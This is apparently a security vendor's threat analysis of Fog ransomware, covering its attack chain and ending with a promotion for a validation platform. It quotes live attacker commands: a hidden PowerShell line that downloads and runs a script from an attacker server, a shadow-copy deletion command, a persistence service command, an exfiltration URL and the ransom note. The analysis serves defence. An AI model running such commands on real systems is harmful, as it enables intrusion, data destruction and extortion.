In May 2024, a new and dynamic threat emerged on the cybercrime landscape: Fog ransomware. In a relatively short period, this operation has distinguished itself through a rapid evolution in targeting, a sophisticated multi-pronged extortion model, and the deployment of an unusually advanced and atypical toolset. Analysis of its campaigns reveals a threat actor that is not only proficient in modern ransomware tactics but also employs techniques more commonly associated with espionage and advanced persistent threat (APT) groups.
The operational trajectory of Fog ransomware demonstrates a clear and calculated maturation. Initial campaigns were narrowly focused, primarily targeting organizations in the education and recreation sectors within the United States [1]. These sectors were likely chosen for their perceived weaker security postures and under-resourced security teams, providing a low-risk environment for the attackers to test and refine their TTPs. However, this initial phase was short-lived. The group quickly pivoted to a more opportunistic model, expanding its scope to include a wider range of industries. This escalation culminated in a successful attack against a financial institution in Asia in May 2025, a high-value and typically well-defended target [2].
At its core, Fog operates on a double-extortion model, combining the encryption of critical data with the exfiltration of sensitive information. Victims who refuse to pay the ransom are threatened with the public release of their stolen data on a dedicated TOR-based Data Leak Site (DLS).
This post analyzes FOG ransomware, detailing its multi-stage attack chain, from initial access via vulnerabilities, credentials, or phishing, to privilege escalation, lateral movement, data exfiltration, and final encryption with double extortion. We conclude with how the Picus Platform helps defend against the FOG ransomware campaign.
The Fog ransomware attack chain is a methodical, multi-stage process that demonstrates patience, sophistication, and a clear focus on maximizing impact. The lifecycle progresses from initial network access through deep network infiltration and data theft, culminating in the deployment of the ransomware payload and the final extortion demand.
Fog operators have demonstrated flexibility in gaining their initial foothold, employing several distinct vectors to breach target networks.
Vulnerability Exploitation
A primary method of entry involves the exploitation of known vulnerabilities in public-facing applications. Attacks have been observed targeting specific weaknesses in VPN appliances, most notably SonicWall SSL VPNs between August and November 2024, possibly leveraging the vulnerability tracked as CVE-2024-40766 [1].
In another campaign in October 2024, the attackers targeted a critical vulnerability (CVE-2024-40711, CVSS 9.8) in Veeam Backup & Replication (VBR) servers [2], demonstrating a strategic focus on compromising data protection infrastructure to undermine recovery efforts.
Credential Compromise
The use of compromised credentials remains a staple of the group's initial access strategy. Operators have been known to purchase credentials for corporate networks from Initial Access Brokers (IABs) or exploit weak VPN passwords obtained through other means [1].
Phishing Campaigns
The threat actor has also evolved to incorporate email-based phishing attacks. A campaign in April 2025 utilized a malicious ZIP archive named Pay Adjustment.zip. Contained within this archive was a malicious LNK file. When a user clicks this file, it executes a command that downloads and runs a PowerShell script, stage1.ps1, from an attacker-controlled server, thereby initiating the infection chain on the endpoint.
The command, which is given below, is designed to be stealthy, running without a visible window [3].
|
C:\Windows\System32\cmd.exe /c start "" /min powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "iwr -uri 'https://hilarious-trifle-d9182e.netlify.app/stage1.ps1' -UseBasicParsing | IEX" |
The downloaded PowerShell script "stage1.ps1" conducts a multi-stage operation that fetches additional components, including a ransomware loader named cwiper.exe, a tool called ktool.exe, and further PowerShell scripts.
Alongside these activities, it launches politically themed YouTube videos and embeds written political commentary within its code [3]:
|
### Ransomware Loader (cwiper.exe)
|
Once an initial foothold is established, the attackers immediately work to escalate their privileges and expand their control across the network.
Discovery
The operators conduct extensive discovery to map the network and identify high-value targets. This includes performing Active Directory enumeration, potentially with tools like BloodHound, to analyze user rights and identify complex privilege escalation paths.
In a recent attack, the open-source C2 tool GC2 was used to execute a series of discovery commands to understand the compromised system's configuration and network connectivity [2]:
|
whoami |
Privilege Escalation
A critical tool observed for privilege escalation is a utility named ktool.exe. This executable exploits a known vulnerability in the Intel Network Adapter Diagnostic Driver, iQVW64.sys, to gain SYSTEM-level privileges. The vulnerable driver is embedded within the ktool.exe binary itself and is extracted to the %TEMP% folder during execution. To trigger the exploit, the attackers provide the process ID (PID) of their target process along with a hardcoded key "fd6c57fa3852aec8" [3].
|
sub_1400088B0("[+] Device opened\n"); |
Lateral Movement
To move across the network, the attackers employ a combination of legitimate system administration tools and credential theft techniques. "Living off the land" tools like PsExec and SMBExec are frequently used to execute commands and payloads on remote systems. These are often combined with techniques such as pass-the-hash and credential stuffing to leverage any credentials stolen during the discovery phase, allowing the attackers to compromise additional endpoints and servers, including domain controllers. The commands below show the usage of PsExec and SMBExec by attackers [2]:
|
### PsExec was used to laterally execute a suspected watchdog or launcher component associated with the GC2 backdoor.
|
This stage of the attack reveals the group's deeper motivations, which extend beyond simple data encryption. The operational methodology observed deviates significantly from typical ransomware campaigns, exhibiting a clear emphasis on intelligence gathering and espionage prior to the final encryption stage. The attackers in one incident remained on the victim's network for approximately two weeks before deploying the ransomware [2].
Command and Control (C2)
The attackers establish a sophisticated and resilient C2 infrastructure to maintain long-term control. This has been observed to include:
Information Stealing and Espionage
The deployment of specific tools indicates a clear intent to spy on victim activities.
|
CSIDL_SYSTEM\regsvr32.exe" /s /u [REDACTED] Files\Ekran System\Ekran System\Client\SoundCapture_7.20.576.0.dll"" |
Also, commands resembling the removal or termination of the Syteca executable were observed, indicating an effort to erase traces of activity [2]:
|
CSIDL_SYSTEM\taskkill.exe /f /im "EkranClient.exe" |
Custom PowerShell Scripts
Two custom PowerShell scripts, lootsubmit.ps1 and trackerjacker.ps1, were used to automate intelligence gathering on compromised hosts. Both collect extensive system and hardware details, including IP address, CPU configuration, network settings, and other identifiers, and attempt to determine physical location by querying the Wigle Wi‑Fi API.
Lootsubmit.ps1 retrieves the IPv4 gateway, finds a MAC address, performs the Wigle lookup, and exfiltrates all data to hxxps://hilarious-trifle-d9182e.netlify[.]app.
Trackerjacker.ps1 mirrors this functionality but embeds its code in Base64 and XORs it with the value 85, and it features an enhanced Get-GatewayMACs function that adds ARP-based MAC address resolution [3].
Persistence
The attackers go to great lengths to ensure their access to the network is maintained. In one notable case, a new service was created to establish persistence after the ransomware had already been deployed, an unusual step that strongly suggests a desire to retain long-term access for future operations [2].
|
sc create SecurityHealthIron binPath= "CSIDL_SYSTEM\diagsvcs\runtimebroker.exe" start= auto DisplayName= "Collect performance information about an application by using command-line tools."
|
Additionally, a custom "Process Watchdog" program was used to continuously monitor for the GC2 C2 agent process (C:\ProgramData\Microsoft\Windows\Models\AppxModels.exe) and relaunch it if it was ever terminated [2].
Data Staging and Exfiltration
Before initiating the encryption routine, the attackers exfiltrate large volumes of sensitive data to be used in their double-extortion scheme. To avoid detection, they use legitimate and common open-source tools for this process [2]:
Backup Deletion
To cripple recovery efforts, the ransomware payload systematically deletes all volume shadow copies on Windows systems. This is accomplished by executing the legitimate vssadmin.exe utility with specific command-line arguments [4].
|
vssadmin.exe delete shadows / all /quiet |
Encryption
The malware employs a robust hybrid encryption scheme, using a fast symmetric algorithm like AES to encrypt the file contents and a strong asymmetric algorithm like RSA to protect the AES key. This makes decryption without the attackers' private key computationally infeasible. Once encrypted, files are appended with one of several extensions: .FOG, .Fog, or .FLOCKED [4].
Extortion
Finally, a ransom note is dropped into every directory containing encrypted files. The note is named readme.txt. It contains instructions for the victim to contact the attackers via a TOR-based victim portal to negotiate payment.
If the victim fails to comply, the exfiltrated data is published on the group's DLS, which was first observed in July 2024. Below is the readme.txt’s content [4]:
|
If you are reading this, then you have been the victim of a cyber attack. We call ourselves Fog and we take responsibility for this incident. We are the ones who encrypted your data and also copied some of it to our internal resource. The sooner you contact us, the sooner we can resolve this incident and get you back to work. To contact us you need to have Tor browser installed:
1. Follow this link: xql562evsy7njcsngacphc2erzjfecwotdkobn3m4uxu2gtqh26newid.onion 2. Enter the code: 062V5NYWBJ3QB420IXRT9KL6 3. Now we can communicate safely. If you are decision-maker, you will get all the details when you get in touch. We are waiting for you. |
In one unusual campaign, the ransom note reportedly mocked a government initiative and offered a "decrypt for free" option if the victim agreed to spread the ransomware to another computer [3].
We also strongly suggest simulating Fog Ransomware Campaign Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other ransomware variants, such as HybridPetya, Yurei, BlackNevas, and CyberVolk, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for the Fog Ransomware Campaign:
|
Threat ID |
Threat Name |
Attack Module |
|
67513 |
Fog Ransomware Download Threat |
Network Infiltration |
|
68459 |
Fog Ransomware Email Threat |
Network Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
[1] K. Baker, "What is Fog Ransomware?," CrowdStrike.com. Accessed: Oct. 31, 2025. [Online]. Available: https://www.crowdstrike.com/en-us/cybersecurity-101/ransomware/fog-ransomware/
[2] "Fog Ransomware: Unusual Toolset Used in Recent Attack." Accessed: Oct. 31, 2025. [Online]. Available: https://www.security.com/threat-intelligence/fog-ransomware-attack
[3] "FOG Ransomware Spread by Cybercriminals Claiming Ties to DOGE," Trend Micro. Accessed: Oct. 31, 2025. [Online]. Available: https://www.trendmicro.com/en_us/research/25/d/fog-ransomware-concealed-within-binary-loaders-linking-themselve.html
[4] "Fog Ransomware: In-Depth Analysis, Detection, and Mitigation," SentinelOne. Accessed: Nov. 02, 2025. [Online]. Available: https://www.sentinelone.com/anthology/fog/